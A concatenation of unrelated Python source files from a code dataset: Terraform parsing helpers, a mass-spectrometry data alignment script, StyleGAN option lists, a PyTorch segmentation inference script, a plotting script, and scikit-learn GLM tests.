def get_module_dependency_map(tf_definitions):
"""
:param tf_definitions, with paths in format 'dir/main.tf[module_dir/main.tf#0]'
:return module_dependency_map: mapping between directories and the location of its module definition:
{'dir': 'module_dir/main.tf'}
:return tf_definitions: with paths in format 'dir/main.tf'
"""
module_dependency_map = {}
copy_of_tf_definitions = {}
dep_index_mapping: Dict[Tuple[str, str], List[str]] = {}
origin_keys = list(filter(lambda k: not k.endswith(']'), tf_definitions.keys()))
unevaluated_keys = list(filter(lambda k: k.endswith(']'), tf_definitions.keys()))
for file_path in origin_keys:
dir_name = os.path.dirname(file_path)
module_dependency_map[dir_name] = [[]]
copy_of_tf_definitions[file_path] = deepcopy(tf_definitions[file_path])
next_level, unevaluated_keys = Parser.get_next_vertices(origin_keys, unevaluated_keys)
while next_level:
for file_path in next_level:
path, module_dependency, module_dependency_num = remove_module_dependency_in_path(file_path)
dir_name = os.path.dirname(path)
current_deps = deepcopy(module_dependency_map[os.path.dirname(module_dependency)])
for dep in current_deps:
dep.append(module_dependency)
if dir_name not in module_dependency_map:
module_dependency_map[dir_name] = current_deps
elif current_deps not in module_dependency_map[dir_name]:
module_dependency_map[dir_name] += current_deps
copy_of_tf_definitions[path] = deepcopy(tf_definitions[file_path])
origin_keys.append(path)
dep_index_mapping.setdefault((path, module_dependency), []).append(module_dependency_num)
next_level, unevaluated_keys = Parser.get_next_vertices(origin_keys, unevaluated_keys)
for key, dep_trails in module_dependency_map.items():
hashes = set()
deduped = []
for trail in dep_trails:
trail_hash = unify_dependency_path(trail)
if trail_hash in hashes:
continue
hashes.add(trail_hash)
deduped.append(trail)
module_dependency_map[key] = deduped
return module_dependency_map, copy_of_tf_definitions, dep_index_mapping
@staticmethod
def get_new_module(
source_dir: str,
module_dependency_map: Dict[str, List[List[str]]],
module_address_map: Dict[Tuple[str, str], str],
external_modules_source_map: Dict[Tuple[str, str], str],
dep_index_mapping: Dict[Tuple[str, str], List[str]],
) -> Module:
return Module(
source_dir=source_dir,
module_dependency_map=module_dependency_map,
module_address_map=module_address_map,
external_modules_source_map=external_modules_source_map,
dep_index_mapping=dep_index_mapping
)
def add_tfvars(self, module, source):
if not self.external_variables_data:
return
for (var_name, default, path) in self.external_variables_data:
if ".tfvars" in path:
block = {var_name: {"default": default}}
module.add_blocks(BlockType.TF_VARIABLE, block, path, source)
def _load_or_die_quietly(file: os.PathLike, parsing_errors: Dict,
clean_definitions: bool = True) -> Optional[Mapping]:
"""
Load JSON or HCL, depending on filename.
:return: None if the file can't be loaded
"""
file_path = os.fspath(file)
file_name = os.path.basename(file_path)
try:
logging.debug(f"Parsing {file_path}")
with open(file_path, "r") as f:
if file_name.endswith(".json"):
return json.load(f)
else:
raw_data = hcl2.load(f)
non_malformed_definitions = validate_malformed_definitions(raw_data)
if clean_definitions:
return clean_bad_definitions(non_malformed_definitions)
else:
return non_malformed_definitions
except Exception as e:
logging.debug(f'failed while parsing file {file_path}', exc_info=e)
parsing_errors[file_path] = e
return None
def _is_valid_block(block):
if not isinstance(block, dict):
return True
# if the block is empty, there's no need to process it further
if len(block) == 0:
return False
entity_name, _ = next(iter(block.items()))
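    # Rough reading of the check below: a valid block label starts with a letter
    # or underscore and contains only word characters or hyphens.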
if re.fullmatch(r'[^\W0-9][\w-]*', entity_name):
return True
return False
def validate_malformed_definitions(raw_data):
raw_data_cleaned = raw_data
for block_type, blocks in raw_data.items():
raw_data_cleaned[block_type] = [block for block in blocks if _is_valid_block(block)]
return raw_data_cleaned
def clean_bad_definitions(tf_definition_list):
return {
block_type: list(filter(lambda definition_list: block_type == 'locals' or
not isinstance(definition_list, dict)
or len(definition_list.keys()) == 1,
tf_definition_list[block_type]))
for block_type in tf_definition_list.keys()
}
def _to_native_value(value: str) -> Any:
if value.startswith('"') or value.startswith("'"):
return value[1:-1]
else:
return eval_string(value)
def _remove_module_dependency_in_path(path):
"""
:param path: path that looks like "dir/main.tf[other_dir/x.tf#0]
:return: only the outer path: dir/main.tf
"""
resolved_module_pattern = r'\[.+\#.+\]'
if re.findall(resolved_module_pattern, path):
path = re.sub(resolved_module_pattern, '', path)
return path
def _safe_index(sequence_hopefully, index) -> Optional[Any]:
try:
return sequence_hopefully[index]
except IndexError as e:
        logging.debug(f'Failed to get index ({index}) from {sequence_hopefully}')
logging.debug(e, stack_info=True)
return None
def is_acceptable_module_param(value: Any) -> bool:
"""
This function determines if a value should be passed to a module as a parameter. We don't want to pass
unresolved var, local or module references because they can't be resolved from the module, so they need
to be resolved prior to being passed down.
"""
value_type = type(value)
if value_type is dict:
for k, v in value.items():
if not is_acceptable_module_param(v) or not is_acceptable_module_param(k):
return False
return True
if value_type is set or value_type is list:
for v in value:
if not is_acceptable_module_param(v):
return False
return True
    if value_type is not str:
return True
for vbm in find_var_blocks(value):
if vbm.is_simple_var():
return False
return True
|
the-stack_106_22156
|
import pandas as pd
import os
import sys
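# Rough intent of this script (as read from the code below): align each sample's
# peak list onto the union of all observed masses, fill missing masses with 0,
# and concatenate the aligned intensity columns into one matrix for PCA.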
#data=pd.read_excel(sys.argv[1])
data=pd.read_excel('/Users/siaga/Desktop/processedData.xlsx')
mass=set()
basket=pd.DataFrame()
excelList=os.listdir('/Users/siaga/Desktop/NFT')
for i in excelList:
i=i.replace('.xlsx','')
i=i.replace('-','_')
locals()['data'+i]=data[['mass'+i,i]].dropna()
mass.update(data['mass'+i])
mass = {x for x in mass if pd.notna(x)}
for m in excelList:
m=m.replace('.xlsx','')
m=m.replace('-','_')
locals()['masse'+m]=mass-set(data['mass'+m])
locals()['masse'+m]=pd.DataFrame(locals()['masse'+m],columns=['mass'+m])
locals()['data'+m]=pd.concat([locals()['data'+m],locals()['masse'+m]],ignore_index=True,sort=False).fillna(0)
locals()['data'+m]=locals()['data'+m].sort_values(by=['mass'+m])
locals()['data' + m]=locals()['data'+m].reset_index(drop=True)
basket=pd.concat([basket,locals()['data'+m]],axis=1,sort=False)
basket=basket.rename(columns={'massL5_450':"mtoz"})
for column in basket:
if 'mass' in column:
del basket[column]
basket[['mtoz','formula']]=basket['mtoz'].str.split(',',expand=True)
basket['mtoz']=basket['mtoz'].astype(float)
basket=basket.sort_values(by=['mtoz'])
basket.to_excel('/Users/siaga/Desktop/pca_processed.xlsx',index=False)
# data.to_excel('/Users/siaga/Desktop/pca_processed.xlsx')
# masse1=pd.DataFrame(masse1,columns=['mass1'])
# data1=pd.concat([data1,masse1],ignore_index=True,sort=False).fillna(0)
# data1=data1.sort_values(by=['mass1'])
# masse2=pd.DataFrame(masse2,columns=['mass2'])
# masse3=pd.DataFrame(masse3,columns=['mass3'])
# masse4=pd.DataFrame(masse4,columns=['mass4'])
# masse5=pd.DataFrame(masse5,columns=['mass5'])
# masse6=pd.DataFrame(masse6,columns=['mass6'])
# data=pd.concat([data,masse1,masse2,masse3,masse4,masse5,masse6],ignore_index=True,sort=False)
# data.to_excel('/Users/siaga/Desktop/pca_processed.xlsx')
|
the-stack_106_22157
|
"""
Options for Streamlit widgets.
"""
style_gan_choices = [
"faces (ffhq slim 256x256)",
"lsun cats",
"wildlife",
"my little pony",
"grumpy cat",
"lsun cars",
"beetles",
"more abstract art",
"obama",
"abstract photos",
"horse",
"cakes",
"car (config-e)",
"painting faces",
"butterflies",
"faces (ffhq config-e)",
"microscope images",
"ukiyo-e faces",
"cifar 10",
"car (config-f)",
"wikiart faces",
"wikiart",
"figure drawings",
"cat",
"anime portraits",
"anime faces",
"fireworks",
"celeba hq faces",
"textures",
"fursona",
"faces (ffhq config-f 512x512)",
"trypophobia",
"abstract art",
"floor plans",
"ukiyoe faces",
"cifar 100",
"panda",
"church",
"maps",
"ffhq faces",
"lsun bedrooms",
"pokemon",
"imagenet",
"modern art",
"vases",
"flowers",
"faces (ffhq config-e 256x256)",
"doors",
"faces (ffhq config-f)",
]
|
the-stack_106_22160
|
import os
from os import path, makedirs, listdir
import sys
import numpy as np
np.random.seed(1)
import random
random.seed(1)
import torch
from torch import nn
from torch.backends import cudnn
from torch.autograd import Variable
import pandas as pd
from tqdm import tqdm
import timeit
import cv2
from sklearn.model_selection import train_test_split
from zoo.models import SeResNext50_Unet_Double
from utils import *
cv2.setNumThreads(0)
cv2.ocl.setUseOpenCL(False)
test_dir = 'test/images'
models_folder = 'weights'
all_files = np.array(get_files())
val_idxs = train_test_split(np.arange(len(all_files)).astype(int), test_size=0.1, random_state=0)[1]
all_files= all_files[val_idxs]
if __name__ == '__main__':
t0 = timeit.default_timer()
seed = int(sys.argv[1])
vis_dev = sys.argv[2]
# os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
os.environ["CUDA_VISIBLE_DEVICES"] = vis_dev
pred_folder = 'res50cls_cce_{}_tuned'.format(seed)
makedirs(pred_folder, exist_ok=True)
# cudnn.benchmark = True
models = []
# for seed in [1]:
snap_to_load = 'res50_cls_cce_{}_0_best'.format(seed)
model = SeResNext50_Unet_Double().cuda()
model = nn.DataParallel(model).cuda()
print("=> loading checkpoint '{}'".format(snap_to_load))
checkpoint = torch.load(path.join(models_folder, snap_to_load), map_location='cpu')
loaded_dict = checkpoint['state_dict']
sd = model.state_dict()
for k in model.state_dict():
if k in loaded_dict and sd[k].size() == loaded_dict[k].size():
sd[k] = loaded_dict[k]
loaded_dict = sd
model.load_state_dict(loaded_dict)
print("loaded checkpoint '{}' (epoch {}, best_score {})"
.format(snap_to_load, checkpoint['epoch'], checkpoint['best_score']))
model.eval()
models.append(model)
with torch.no_grad():
for fn in tqdm(sorted(all_files)):
if '_pre_' in fn:
f = os.path.basename(fn)
img = cv2.imread(fn, cv2.IMREAD_COLOR)
img2 = cv2.imread(fn.replace('_pre_', '_post_'), cv2.IMREAD_COLOR)
img = np.concatenate([img, img2], axis=2)
img = preprocess_inputs(img)
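                # Test-time augmentation: batch the original image together with its
                # vertical, horizontal, and combined flips; the predictions are
                # flipped back and averaged further below.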
inp = []
inp.append(img)
inp.append(img[::-1, ...])
inp.append(img[:, ::-1, ...])
inp.append(img[::-1, ::-1, ...])
inp = np.asarray(inp, dtype='float')
inp = torch.from_numpy(inp.transpose((0, 3, 1, 2))).float()
inp = Variable(inp).cuda()
pred = []
for model in models:
msk = model(inp)
msk = torch.softmax(msk[:, :, ...], dim=1)
msk = msk.cpu().numpy()
msk[:, 0, ...] = 1 - msk[:, 0, ...]
pred.append(msk[0, ...])
pred.append(msk[1, :, ::-1, :])
pred.append(msk[2, :, :, ::-1])
pred.append(msk[3, :, ::-1, ::-1])
pred_full = np.asarray(pred).mean(axis=0)
msk = pred_full * 255
msk = msk.astype('uint8').transpose(1, 2, 0)
cv2.imwrite(path.join(pred_folder, '{0}.png'.format(f.replace('.jpg', '_part1.png'))), msk[..., :3], [cv2.IMWRITE_PNG_COMPRESSION, 9])
cv2.imwrite(path.join(pred_folder, '{0}.png'.format(f.replace('.jpg', '_part2.png'))), msk[..., 2:], [cv2.IMWRITE_PNG_COMPRESSION, 9])
elapsed = timeit.default_timer() - t0
print('Time: {:.3f} min'.format(elapsed / 60))
|
the-stack_106_22161
|
import csv
with open('graphs/class1.csv', newline='') as f:
reader = csv.reader(f)
file_data = list(reader)
#To remove headers from CSV
file_data.pop(0)
total_marks = 0
total_entries = len(file_data)
for marks in file_data:
total_marks += float(marks[1])
mean = total_marks / total_entries
print("Mean (Average) is -> "+str(mean))
import pandas as pd
import plotly.express as px
df = pd.read_csv("graphs/class1.csv")
fig = px.scatter(df, x="Student Number",
y="Marks"
)
fig.update_layout(shapes=[
dict(
type= 'line',
y0= mean, y1= mean,
x0= 0, x1= total_entries
)
])
fig.update_yaxes(rangemode="tozero")
fig.show()
|
the-stack_106_22164
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from contextlib import contextmanager
from logging import getLogger
import os
from tempfile import TemporaryFile
import mimetypes
from future.standard_library import install_aliases
install_aliases()
from urllib.parse import urlparse, urljoin
from urllib.request import urlopen, Request
from urllib.error import HTTPError
logger = getLogger(__name__)
def get_storage(dirname, **kwargs):
result = urlparse(dirname)
if not result.scheme:
return FileSystemStorage(dirname, **kwargs)
elif result.scheme == 's3':
return S3Storage(result.netloc, result.path, **kwargs)
elif result.scheme == 'hdfs':
return HdfsStorage(result.netloc, result.path, **kwargs)
else:
return UrlStorage(dirname, **kwargs)
def _get_mime(filename):
filetype, encoding = mimetypes.guess_type(filename)
return filetype
class _BaseStorage(object):
def open(self, key):
raise NotImplementedError
def get(self, key):
raise NotImplementedError
def exists(self, key):
raise NotImplementedError
def put(self, key, value):
raise NotImplementedError
def delete(self, key):
raise NotImplementedError
def list(self):
raise NotImplementedError
def url(self, path=''):
raise NotImplementedError
class FileSystemStorage(_BaseStorage):
def __init__(self, path):
self.basedir = path
if not self.basedir:
self.basedir = '.'
def _ensure_dir(self, dirname):
if not os.path.exists(dirname):
logger.debug('Creating {}'.format(dirname))
os.makedirs(dirname)
@contextmanager
def open(self, filename, mode='rb'):
path = os.path.join(self.basedir, filename)
if mode.startswith('w'):
self._ensure_dir(os.path.dirname(path))
with open(path, mode) as f:
yield f
def get(self, filename, mode='rb'):
with self.open(filename, mode=mode) as f:
return f.read()
def exists(self, filename):
return os.path.exists(os.path.join(self.basedir, filename))
def put(self, filename, value, mode='wb'):
with self.open(filename, mode=mode) as f:
f.write(value)
def delete(self, filename, **kwargs):
os.remove(os.path.join(self.basedir, filename))
def list(self):
for path in os.listdir(self.basedir):
yield path
def url(self, path=''):
return os.path.abspath(os.path.join(self.basedir, path))
class S3Storage(_BaseStorage):
def __init__(self, bucket, key_prefix='', **kwargs):
import boto3
self.bucket = boto3.resource('s3').Bucket(bucket)
self.key_prefix = key_prefix.lstrip('/')
self.options = dict(ACL='public-read')
self.options.update(kwargs)
@contextmanager
def open(self, key, mode='rb', **kwargs):
key = os.path.join(self.key_prefix, key)
if mode.startswith('r'):
with TemporaryFile() as f:
self.bucket.download_fileobj(key, f, **kwargs)
f.seek(0)
yield f
elif mode.startswith('w'):
with TemporaryFile() as f:
yield f
f.seek(0)
self.bucket.upload_fileobj(f, key, **kwargs)
else:
raise ValueError('Unsupported mode {}'.format(mode))
def get(self, key, **kwargs):
with self.open(key, **kwargs) as f:
return f.read()
def exists(self, key):
import botocore
key = os.path.join(self.key_prefix, key)
exists = True
try:
self.bucket.Object(key).load()
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == '404':
exists = False
else:
raise
return exists
def put(self, key, value, **kwargs):
key = os.path.join(self.key_prefix, key)
options = dict(self.options)
options.update(kwargs)
self.bucket.Object(key).put(
Body=value, ContentType=_get_mime(key),
ContentDisposition='inline; filename="{}"'.format(
os.path.basename(key)),
**options)
def delete(self, key, **kwargs):
key = os.path.join(self.key_prefix, key)
self.bucket.Object(key).delete(**kwargs)
def list(self):
for obj in self.bucket.objects.filter(Prefix=self.key_prefix):
yield obj.key.replace(self.key_prefix, "").lstrip('/')
def url(self, path=''):
return ('s3://' + self.bucket.name + '/' +
os.path.normpath(os.path.join(self.key_prefix, path)))
class HdfsStorage(_BaseStorage):
def __init__(self, namenode, path, use_trash=False, effective_user=None,
use_sasl=True, hdfs_namenode_principal='hdfs',
use_datanode_hostname=False):
from snakebite.client import HAClient
from snakebite.namenode import Namenode
self.path = path
namenodes = [Namenode(namenode)]
self._client = HAClient(
namenodes,
use_trash=use_trash,
effective_user=effective_user,
use_sasl=use_sasl,
hdfs_namenode_principal=hdfs_namenode_principal,
use_datanode_hostname=use_datanode_hostname
)
@contextmanager
def open(self, filename, mode='rb', **kwargs):
path = '{0}/{1}'.format(self.path, filename)
if mode.startswith('r'):
stream = self._hdfs_file_stream(path)
try:
yield stream
finally:
stream.close()
elif mode.startswith('w'):
raise NotImplementedError
else:
raise ValueError('Unsupported mode {}'.format(mode))
def _hdfs_file_stream(self, path):
try:
from cStringIO import StringIO
except:
from StringIO import StringIO
generator = self._client.cat([path]).next()
buf = StringIO()
for i in generator:
buf.write(i)
buf.seek(0)
return buf
def get(self, path, **kwargs):
with self._hdfs_file_stream(path) as f:
return f.getvalue()
class UrlStorage(_BaseStorage):
def __init__(self, base_url, **kwargs):
self.base_url = base_url
@contextmanager
def open(self, path, **kwargs):
url = os.path.join(self.base_url, path)
with TemporaryFile() as f:
with urlopen(url, **kwargs) as response:
f.write(response.read())
f.seek(0)
yield f
def get(self, path, **kwargs):
with self.open(path, **kwargs) as f:
return f.read()
def exists(self, path):
url = os.path.join(self.base_url, path)
request = Request(url, method='HEAD')
exists = True
try:
urlopen(request)
except HTTPError:
exists = False
return exists
def url(self, path=''):
return urljoin(self.base_url, path)
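

# Illustrative usage sketch (not part of the original module); the directory,
# bucket, and URLs below are placeholders.
if __name__ == '__main__':
    local = get_storage('./artifacts')      # no scheme -> FileSystemStorage
    local.put('hello.txt', b'hello world')
    print(local.get('hello.txt'))
    print(local.url('hello.txt'))
    # Remote backends are selected by URL scheme, e.g.:
    #   get_storage('s3://my-bucket/prefix')       -> S3Storage
    #   get_storage('hdfs://namenode/data')        -> HdfsStorage
    #   get_storage('https://example.com/files/')  -> UrlStorage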
|
the-stack_106_22167
|
# This code calibrates magnetometer. Please add the scale values to the other file codes when imu_algorithms are used.
from modules.mpulib import computeheading, attitudefromCompassGravity
import socket, traceback
import csv
import struct
import sys, time, string, pygame
import pygame
import pygame.draw
import pygame.time
import numpy as np
from math import sin, cos, acos
from modules.euclid import Vector3, Quaternion
from modules.EuclidObjects import Cube, Screen, Grid, PerspectiveScreen
import math
# from pygame.locals import *
# from ponycube import *
from modules.madgwickahrs import *
import modules.quaternion
from modules.quaternion import QuaternionClass
from modules.a3muse import quatNormalized, IntegrationRK4, EulerToQuat, AccMagOrientation, headingfromMag, QuatToEuler, angle_between, QuatToRotMat, AxisAngleToRotMat, RotMatToQuat
from math import atan2, atan
from numpy.linalg import inv
from numpy import linalg as LA
import matplotlib.pyplot as plt
# import euclid
filename = open('mag_values_for_calibration.txt','w')
i = 0
import serial
ser = serial.Serial('/dev/tty.usbmodem14611')
ser.baudrate = 115200
ser.timeout = 3
# reading: time, mx, my, mz, heading
while i < 2000 :
reading = ser.readline()
print(reading)
#print(reading)
sp = str(reading).split(',')
# print(sp)
time = float(sp[0][2:].strip())
mx = float(sp[7].strip())
my = float(sp[8].strip())
mz = float(sp[9].strip())
mag = [mx, my, mz]
print(i)
print(mag)
print(mx, my, mz, file = filename)
i = i + 1
print("calibration done")
filename.close()
filename = open('mag_calib.txt','r')
mx = []
my = []
mz = []
for i in filename:
sp = i.split()
mx.append(float(sp[0]))
my.append(float(sp[1]))
mz.append(float(sp[2]))
# print(sp[0])
filename.close()
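# Min-max calibration sketch: the hard-iron offset for each axis is the midpoint
# of its min/max readings, and the soft-iron scale factors computed below rescale
# each axis so the corrected readings have roughly equal spread.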
offset_mx = (max(mx) + min(mx)) / 2
offset_my = (max(my) + min(my)) / 2
offset_mz = (max(mz) + min(mz)) / 2
print("offset_mx = ",offset_mx)
print("offset_my = ", offset_my)
print("offset_mz = ", offset_mz)
cmx = []
cmy = []
cmz = []
# print(mx)
# print(len(mx))
for k in range(len(mx)):
cmx.append(mx[k] - offset_mx)
cmy.append(my[k] - offset_my)
cmz.append(mz[k] - offset_mz)
avg_delta_mx = (max(cmx) - min(cmx)) / 2
avg_delta_my = (max(cmy) - min(cmy)) / 2
avg_delta_mz = (max(cmz) - min(cmz)) / 2
avg_delta = (avg_delta_mx + avg_delta_my + avg_delta_mz) / 3
scale_mx = avg_delta / avg_delta_mx
scale_my = avg_delta / avg_delta_my
scale_mz = avg_delta / avg_delta_mz
print("scale_mx = ", scale_mx)
print("scale_my = ", scale_my)
print("scale_mz = ", scale_mz)
smx = []
smy = []
smz = []
for k in range(len(cmx)):
smx.append(cmx[k]*scale_mx)
smy.append(cmy[k]*scale_my)
smz.append(cmz[k]*scale_mz)
plt.plot(mx, my, '.')
plt.plot(my, mz, '.')
plt.plot(mx, mz, '.')
plt.title("mxyz")
plt.show()
plt.plot(cmx, cmy, '.')
plt.plot(cmy, cmz, '.')
plt.plot(cmx, cmz, '.')
plt.title("cmxyz")
plt.show()
plt.plot(smx, smy, '.')
plt.plot(smy, smz, '.')
plt.plot(smx, smz, '.')
plt.title("smxyz")
plt.show()
|
the-stack_106_22168
|
#!/usr/bin/env python3
import os
import ssl
import argparse
from socketserver import ThreadingMixIn
from http.server import BaseHTTPRequestHandler, HTTPServer
parser = argparse.ArgumentParser(prog="server", description="Python HTTPS Server")
parser.add_argument(
"-m",
"--mtls",
dest="mtls",
action="store_true",
help="Enable mTLS server requirement",
)
parser.add_argument(
"-d",
"--domain",
dest="domain",
type=str,
help="Domain name",
)
parser.add_argument(
"-p",
"--port",
dest="port",
type=int,
help="Port number",
default=443,
)
parser.add_argument(
"-r",
"--cacert",
dest="cacert",
type=str,
help="Provide custom CA Root Certificate",
)
parser.add_argument(
"-c",
"--cert",
dest="cert",
type=str,
help="Provide your domain certificate",
)
parser.add_argument(
"-k",
"--key",
dest="key",
type=str,
help="Provide your domain certificate's private key",
)
args = parser.parse_args()
MTLS: bool = args.mtls
MTLS_ACTIVE_STRING: str = MTLS and "with" or "without"
class SimpleServer(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("content-type", "text/html; charset=utf-8")
self.end_headers()
if MTLS:
message = b"\xf0\x9f\x91\x8b Hello, world with mTLS!\n"
else:
message = b"\xf0\x9f\x91\x8b Hello, world!\n"
self.wfile.write(message)
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
...
if __name__ == "__main__":
server = ThreadingSimpleServer(("", args.port), SimpleServer)
HOSTNAME: str = os.uname().nodename
DOMAIN: str = args.domain or f"{HOSTNAME}.local"
PORT: str = args.port != 443 and f":{args.port}" or ""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_verify_locations(cafile=args.cacert)
context.load_cert_chain(certfile=args.cert, keyfile=args.key)
context.verify_mode = MTLS and ssl.CERT_REQUIRED or ssl.CERT_OPTIONAL
with context.wrap_socket(sock=server.socket, server_side=True) as sock:
try:
server.socket = sock
print(f"Server started https://{DOMAIN}{PORT} {MTLS_ACTIVE_STRING} mTLS")
server.serve_forever()
except KeyboardInterrupt:
pass
print("\rServer exited")
|
the-stack_106_22174
|
from torch import nn, Tensor
class SpatialAttention(nn.Module):
def __init__(self, input_size: int):
super().__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(input_size, input_size // 2, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(input_size // 2),
nn.ReLU()
)
self.conv2 = nn.Sequential(
nn.Conv2d(input_size // 2, input_size // 4, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(input_size // 4),
nn.ReLU()
)
self.conv3 = nn.Sequential(
nn.Conv2d(input_size // 4, 1, kernel_size=3, stride=1, padding=1),
nn.Sigmoid()
)
def forward(self, x: Tensor) -> Tensor:
""" Computes a spatial attention mask with values in [0, 1] for the given input image """
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
return x
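

# Minimal usage sketch (not part of the original module).
if __name__ == "__main__":
    import torch

    attn = SpatialAttention(input_size=64)
    feats = torch.randn(2, 64, 32, 32)   # (batch, channels, height, width)
    mask = attn(feats)                   # shape (2, 1, 32, 32), values in [0, 1]
    attended = feats * mask              # broadcast the mask over the channels
    print(mask.shape, attended.shape)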
|
the-stack_106_22177
|
import operator
import numpy as np
from cvxpy import *
from knapsack.hyper.multiple import problem
def ksp_solve_lp_relaxed_convex(costs, weights, sizes):
x = Variable(len(sizes), len(costs))
weights_param = Parameter(rows=len(sizes), cols=len(costs))
weights_param.value = np.asarray(weights)
costs_param = Parameter(len(costs))
costs_param.value = costs
constr = [diag(x * weights_param.T) < sizes, sum_entries(x, axis=0).T <= [1] * len(costs), 0 < x, x < 1]
objective = Maximize(sum_entries(x * costs_param))
solution = Problem(objective, constr).solve()
return solution
def ksp_solve_lp_relaxed_greedy(costs, weights, sizes):
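    # Greedy LP-relaxation sketch: for each knapsack, rank items by cost/weight
    # density, pack whole items while they fit, then take a fraction of the
    # boundary ("median") item to use up the remaining capacity, respecting
    # fractions already assigned to earlier knapsacks.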
costs = np.asarray(costs)
weights = np.asarray(weights)
sizes = np.asarray(sizes)
included = np.zeros((len(sizes), len(costs)))
for ksp_index, weight in enumerate(weights):
current_characteristics = filter(lambda x: np.sum(included, axis=0)[x[0]] < 1, enumerate(costs / weight))
current_characteristics = list(sorted(current_characteristics, key=operator.itemgetter(1)))
top_median = []
top_items_characteristics_indexes = list(map(operator.itemgetter(0), current_characteristics))
while len(top_items_characteristics_indexes) > 0 and \
np.sum(weight[top_median + [
top_items_characteristics_indexes[len(top_items_characteristics_indexes) - 1]]]) < sizes[
ksp_index]:
top_median.append(top_items_characteristics_indexes.pop())
if len(top_items_characteristics_indexes) == 0:
included[ksp_index][top_median] = np.ones((1, len(top_median))) - np.sum(included, axis=0)[top_median]
break
median_index = top_items_characteristics_indexes.pop()
rest = (sizes[ksp_index] - np.sum(weight[top_median])) / weight[median_index]
included[ksp_index][top_median] = np.ones((1, len(top_median))) - np.sum(included, axis=0)[top_median]
included[ksp_index][median_index] = min(1 - np.sum(included, axis=0)[median_index], rest)
return problem.solve(included, costs, weights, sizes), included
if __name__ == '__main__':
optimal_selection = [[1, 0, 0, 1, 0, 0, 0, 0, 0, 0], [0, 1, 1, 0, 0, 0, 1, 0, 0, 0]]
costs = [92, 57, 49, 68, 60, 43, 67, 84, 87, 72]
weights = [[23, 31, 29, 44, 53, 38, 63, 85, 89, 82],
[23, 31, 29, 44, 53, 38, 63, 85, 89, 82]]
sizes = [70, 127]
optimal_cost = problem.solve(optimal_selection, costs, weights, sizes)
print(ksp_solve_lp_relaxed_greedy(costs, weights, sizes))
|
the-stack_106_22182
|
# -*- coding: utf-8 -*-
# AtCoder Beginner Contest
def main():
n, t = list(map(int, input().split()))
a = [int(input()) for _ in range(n)]
duration = t
# See:
# https://beta.atcoder.jp/contests/abc024/submissions/2841120
for i in range(1, n):
duration += min(t, a[i] - a[i - 1])
print(duration)
if __name__ == '__main__':
main()
|
the-stack_106_22183
|
# Authors: Christian Lorentzen <[email protected]>
#
# License: BSD 3 clause
import numpy as np
from numpy.testing import assert_allclose
import pytest
import warnings
from sklearn.datasets import make_regression
from sklearn.linear_model._glm import GeneralizedLinearRegressor
from sklearn.linear_model import TweedieRegressor, PoissonRegressor, GammaRegressor
from sklearn.linear_model._glm.link import (
IdentityLink,
LogLink,
)
from sklearn._loss.glm_distribution import (
TweedieDistribution,
NormalDistribution,
PoissonDistribution,
GammaDistribution,
InverseGaussianDistribution,
)
from sklearn.linear_model import Ridge
from sklearn.exceptions import ConvergenceWarning
from sklearn.model_selection import train_test_split
@pytest.fixture(scope="module")
def regression_data():
X, y = make_regression(
n_samples=107, n_features=10, n_informative=80, noise=0.5, random_state=2
)
return X, y
def test_sample_weights_validation():
"""Test the raised errors in the validation of sample_weight."""
# scalar value but not positive
X = [[1]]
y = [1]
weights = 0
glm = GeneralizedLinearRegressor()
# Positive weights are accepted
glm.fit(X, y, sample_weight=1)
# 2d array
weights = [[0]]
with pytest.raises(ValueError, match="must be 1D array or scalar"):
glm.fit(X, y, weights)
# 1d but wrong length
weights = [1, 0]
msg = r"sample_weight.shape == \(2,\), expected \(1,\)!"
with pytest.raises(ValueError, match=msg):
glm.fit(X, y, weights)
@pytest.mark.parametrize(
"name, instance",
[
("normal", NormalDistribution()),
("poisson", PoissonDistribution()),
("gamma", GammaDistribution()),
("inverse-gaussian", InverseGaussianDistribution()),
],
)
def test_glm_family_argument(name, instance):
"""Test GLM family argument set as string."""
y = np.array([0.1, 0.5]) # in range of all distributions
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(family=name, alpha=0).fit(X, y)
assert isinstance(glm._family_instance, instance.__class__)
glm = GeneralizedLinearRegressor(family="not a family")
with pytest.raises(ValueError, match="family must be"):
glm.fit(X, y)
@pytest.mark.parametrize(
"name, instance", [("identity", IdentityLink()), ("log", LogLink())]
)
def test_glm_link_argument(name, instance):
"""Test GLM link argument set as string."""
y = np.array([0.1, 0.5]) # in range of all distributions
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(family="normal", link=name).fit(X, y)
assert isinstance(glm._link_instance, instance.__class__)
glm = GeneralizedLinearRegressor(family="normal", link="not a link")
with pytest.raises(ValueError, match="link must be"):
glm.fit(X, y)
@pytest.mark.parametrize(
"family, expected_link_class",
[
("normal", IdentityLink),
("poisson", LogLink),
("gamma", LogLink),
("inverse-gaussian", LogLink),
],
)
def test_glm_link_auto(family, expected_link_class):
# Make sure link='auto' delivers the expected link function
y = np.array([0.1, 0.5]) # in range of all distributions
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(family=family, link="auto").fit(X, y)
assert isinstance(glm._link_instance, expected_link_class)
@pytest.mark.parametrize("alpha", ["not a number", -4.2])
def test_glm_alpha_argument(alpha):
"""Test GLM for invalid alpha argument."""
y = np.array([1, 2])
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(family="normal", alpha=alpha)
with pytest.raises(ValueError, match="Penalty term must be a non-negative"):
glm.fit(X, y)
@pytest.mark.parametrize("fit_intercept", ["not bool", 1, 0, [True]])
def test_glm_fit_intercept_argument(fit_intercept):
"""Test GLM for invalid fit_intercept argument."""
y = np.array([1, 2])
X = np.array([[1], [1]])
glm = GeneralizedLinearRegressor(fit_intercept=fit_intercept)
with pytest.raises(ValueError, match="fit_intercept must be bool"):
glm.fit(X, y)
@pytest.mark.parametrize("solver", ["not a solver", 1, [1]])
def test_glm_solver_argument(solver):
"""Test GLM for invalid solver argument."""
y = np.array([1, 2])
X = np.array([[1], [2]])
glm = GeneralizedLinearRegressor(solver=solver)
with pytest.raises(ValueError):
glm.fit(X, y)
